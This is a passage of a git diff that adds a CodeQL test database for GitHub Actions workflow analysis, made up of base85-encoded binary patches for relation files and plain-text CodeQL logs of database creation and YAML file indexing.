z5BBHa*z}#j^IwD4zSdcU{yjK$BUF5Zu0!QxefO1omZSefmBh`r@4p3+bq$}l;s2+g zLw@*pPM-4r8AC{{I>6A!JEE&leewO{AWK! zyC42`#T&;9Prj$R?SnUc`S(TV9z{w$`_}W-O$v(FzSgI9=N>{5FZH*;9|?-r`sTy2 zo5CX9$Ums>xh0RYu=MNlJKz1kHU7?6q{MwNe>(ndI#}O3`+;-a%@!1=uWM%Ceerk4 zB8ite%%Ec}OaAPJC+E7`tE7+PC7*k{n-jd|%ZHhDd`2ntvR=-aH5hR6vrl#e_ijQ; ze)u!v?jS(tuxI7(9QMKYx0ml_T=Bhj!9S#U<9Ol8nsoDmH#}#8zdkrNJV)RQ@vVPw z$`qCfqPcN6I*z)CY@&$Nxal?K8u4lJa+~6w+mA8!_#wm zRPf5v`OgPGCO9_pbPmS`C*S>GKEIc`rP%PazVA!V?gT87_?YKO!5f|n$U8YWw&l4z zc*Aoc`P?Z=so(Nk5xn8Kh`iH-W4&|aKLYo=O8!g9_xoD@tMK2BMG`Oh&gUJ$8~$M3 zJA-4xpL@7FJ9xvNwe8Lgjtzg-wmUC)!=JV7R)fpaeQUlvIYZrrSS0cBoG%LA@Z5vE zi-Tjs)BUg}c*E2C^L@dw;px47S@4FZ_vcmM^1O107oI2Lf4Jt?`1n5jXz+$7XS(}X zaBO&bFI|go{i`ZZ=fE0vAFuf}Ugp5>jc#qtzqZyl-+Sr$nqT83-+SqX;0+(|r5l4| z!)Frwror#lRzBV{E5UEZ%G0=F-&62!Dc(3<`a1txgExKMZ?^}>rtb{!JA>E0?&n3| zcLm30y++`7V``}RA*8=mgl`@!vd-w-c- z_rrgn=GS=XI}QB7;7#96!5<2aweRNWX5bHFt?%#o^*lTO?eKqqMG`Od{oa2>P`uVR zpYQ1Ihh}exm;5d9e*{Rs?va}BKHM7rQL}5@2j@H;|ED@w-z)3l`TDt_ICZj5_QikP z><#f!XM6l71jQSkbMc=n>En3G_k8^-c+HoO=j%7YvCd80IsYy=`OZz;@BOEOW5a(E z{Ezs~;fc!MIqZY~G*+I*73aAN{-26Bj+gqLufGIuc+Ld>TX1Z6j==wcZ~dn$PwVfD zzYdEeUg}Tb|0{T{KMQ{+@c)|3fAYi@p0jy;hG!)4@qC^Q-tgR&yyt>r!_#}_f59tH z=jnNOt&vhc^K=d`1}EPf^ZDNItr?y^`@Tnj`&lIM@a$g_yy3ZkyiJ1pA=LWt>|YkV z;kgi;J)xBP4bPslH{cD=MdW$@kdnVK57r;yb7th<_vGh$e+fQkLrJ{kGoPNbG~f;Y z!@)U|1J2*@=RWK?O9S5U=RWK?0|UMxIcT&e3>U_t%y8N1n2Hh z63>0u?;pJ3$@hMLU~oT#+Lu}O2V-5Yxs|8&PryF}izHt1snO2^G~eIh?qT!c*t3>O z;w7Io=@$SZef$6CxtIDwgBwKUa}bY*VXbfedY-L+K0bRwNxbC4y?i$v$f|!DepOm**PrbFoO` zmx1TK%(w5Q;Fn{O#K-S-MewFCwfheS_d}?2v+tF`>wAf_hW*tQ=ZuW=*~|Sk z`0{E09X%KS+L~YErTz}!*9C9*cz&-Bjt!rqc)THa!-uod-xwU5xg7(3Q*iR#pYr#f zxg|I@-!GHkx8l>UzlQwhdEN?rKmKi4-^;k-oG-_}U1vkQ)Mw56I}6O`>U+6P+!_5{ Q!LfNS=X`hY=Dm*lKmT;wC;$Ke literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..a3783e268b8d3866cb97455ff14cd484ab0b8d47 GIT binary patch literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..014f03a3a638a16c87b040ee21668cc0ff098479 GIT binary patch literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82 GIT binary patch literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 literal 0 HcmV?d00001 diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..e045b05d47e291009889305846e60f9c1b64b7a1 GIT binary patch literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. +[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test +[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. +[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). +[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. +[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. +[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. +[2024-02-03 10:17:52] Plumbing command codeql database init completed. +[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] +[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. +[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] +[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Plumbing command codeql database trace-command completed. +[2024-02-03 10:17:53] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:53] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:53] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db... +[2024-02-03 10:17:53] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache/version does not exist +[2024-02-03 10:17:53] Tuple pool not found. Clearing relations with cached strings +[2024-02-03 10:17:53] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode clear. +[2024-02-03 10:17:53] Sequence stamp origin is -6222583521912648850 +[2024-02-03 10:17:53] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-02-03 10:17:53] Unpausing evaluation +[2024-02-03 10:17:53] Trimming completed (7ms): Purged everything. +[2024-02-03 10:17:53] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/trap/yaml +[2024-02-03 10:17:53] Found 8 TRAP files (16.41 KiB) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Importing TRAP files +[2024-02-03 10:17:53] Importing changed-files.yml.trap.gz (1 of 8) +[2024-02-03 10:17:53] Importing inter1.yml.trap.gz (2 of 8) +[2024-02-03 10:17:53] Importing no-flow1.yml.trap.gz (3 of 8) +[2024-02-03 10:17:53] Importing no-flow2.yml.trap.gz (4 of 8) +[2024-02-03 10:17:53] Importing simple1.yml.trap.gz (5 of 8) +[2024-02-03 10:17:53] Importing simple2.yml.trap.gz (6 of 8) +[2024-02-03 10:17:53] Importing test.yml.trap.gz (7 of 8) +[2024-02-03 10:17:53] Importing sourceLocationPrefix.trap.gz (8 of 8) +[2024-02-03 10:17:53] [PROGRESS] dataset import> Merging relations +[2024-02-03 10:17:53] Merging 1 fragment for 'files'. +[2024-02-03 10:17:53] Merged 56 bytes for 'files'. +[2024-02-03 10:17:53] Merging 1 fragment for 'folders'. +[2024-02-03 10:17:53] Merged 80 bytes for 'folders'. +[2024-02-03 10:17:53] Merging 1 fragment for 'containerparent'. +[2024-02-03 10:17:53] Merged 128 bytes for 'containerparent'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_scalars'. +[2024-02-03 10:17:53] Merged 3048 bytes (2.98 KiB) for 'yaml_scalars'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'yaml'. +[2024-02-03 10:17:53] Merging 1 fragment for 'locations_default'. +[2024-02-03 10:17:53] Merged 7992 bytes (7.80 KiB) for 'locations_default'. +[2024-02-03 10:17:53] Merging 1 fragment for 'yaml_locations'. +[2024-02-03 10:17:53] Merged 2664 bytes (2.60 KiB) for 'yaml_locations'. +[2024-02-03 10:17:53] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-02-03 10:17:53] Saving string and id pools to disk. +[2024-02-03 10:17:54] Finished importing TRAP files. +[2024-02-03 10:17:54] Read 77.48 KiB of uncompressed TRAP data. +[2024-02-03 10:17:54] Relation data size: 21.45 KiB (merge rate: 1.20 MiB/s) +[2024-02-03 10:17:54] String pool size: 2.05 MiB +[2024-02-03 10:17:54] ID pool size: 1.03 MiB +[2024-02-03 10:17:54] [PROGRESS] dataset import> Finished writing database (relations: 21.45 KiB; string pool: 2.05 MiB). +[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Plumbing command codeql dataset import completed. +[2024-02-03 10:17:54] [PROGRESS] database finalize> TRAP import complete (817ms). +[2024-02-03 10:17:54] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> TRAP files cleaned up (6ms). +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-02-03 10:17:54] [PROGRESS] database cleanup> Scratch directory cleaned up (0ms). +[2024-02-03 10:17:54] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml. +[2024-02-03 10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. +[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 +[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. +[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 +[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. +[2024-02-03 10:17:54] Unpausing evaluation +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. +[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml +[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). +[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. +[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. +[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). +[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. +[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. +[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log new file mode 100644 index 00000000000..f410634a29f --- /dev/null +++ b/ql/src/test-db/log/database-index-files-20240203.101752.962.log @@ -0,0 +1,21 @@ +[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db +[2024-02-03 10:17:52] Log file was started late. +[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json +[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", + "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" + ] +[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. +[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... +[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. +[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] +[2024-02-03 10:17:53] Terminating normally. diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..9c82ac3a64444a993e3a461dc000184a22d1e3a8 GIT binary patch literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) 